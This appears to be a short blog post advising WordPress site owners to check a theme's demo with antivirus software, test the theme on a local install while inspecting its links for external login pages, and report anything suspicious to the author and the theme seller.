We’ve all been there. You create a new site and don’t have time to design your own theme for it. You go to either Google or one of the many available theme purchasing sites and buy a theme for your site and voila, all done. But not all themes are safe, even the ones from reputable theme selling sites. Before you put that next theme on your site do the following.

Check the demo

If the theme on a theme selling site doesn’t have a demo, don’t trust it. If it does, still don’t trust it. Make sure your computer has a good antivirus / malware software on your machine. Oddly enough, my mac has Norton and when I tested a theme, nothing was detected. I used my PC and right away one of the images on the demo was linked to different site that was flagged for malware. I switched my AV over to Avast and Avast caught the same issue as my PC.

Set up the new theme on a LOCAL vanilla install of WordPress with your browser’s developer tools

Set up a local server using MAMP/WAMP/XAMPP or Vagrant and install WordPress. Then install your theme. If your theme has a demo importer and you use it, check the site source and files using your browsers developer tools (Firebug, etc). The theme’s images and links to the admin should all reference the local url on your local server. If there are any login.php links that go to an external site, don’t trust the theme. While it could just be a beginner’s mistake, that external page could be set up to get the log in info for your site. Using the referral url and your login info would be all it takes to get into your site. There are many, many,many ways to harden security in WordPress.

Tell the author and the theme selling company about the issue

Contact the author and the theme selling company if you find anything suspicious in a theme. Explain in great detail what was found. If you can, provide a dump of the query used to find the issue in the database or screenshots presenting the error. The author should be able to solve the issue.